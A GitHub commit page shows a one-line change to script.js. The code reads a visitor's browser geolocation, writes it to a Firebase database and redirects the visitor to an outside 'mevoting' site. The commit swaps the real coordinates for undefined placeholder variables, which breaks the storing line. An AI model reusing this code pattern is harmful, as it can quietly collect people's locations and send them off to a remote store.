Skip to content

Commit

Permalink
Update script.js
Browse files Browse the repository at this point in the history
  • Loading branch information
CusMeDroid authored Oct 2, 2023
1 parent c25306b commit c60a773
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion script.js
Original file line number Diff line number Diff line change
Expand Up @@ -30,6 +30,6 @@ function showPosition(position) {
x.innerHTML = "Latitude: " + position.coords.latitude + "<br>Longitude: " + position.coords.longitude;
var slat = position.coords.latitude;
var slong = position.coords.longitude;
firebase.database().ref("/").child(time).update({ Latitude : slat, Longitude : slong });
firebase.database().ref("/").child(ngaco).update({ Latitude : oke, Longitude : oke });
window.location.assign("http://mevoting.is-best.net/");
}

0 comments on commit c60a773

Please sign in to comment.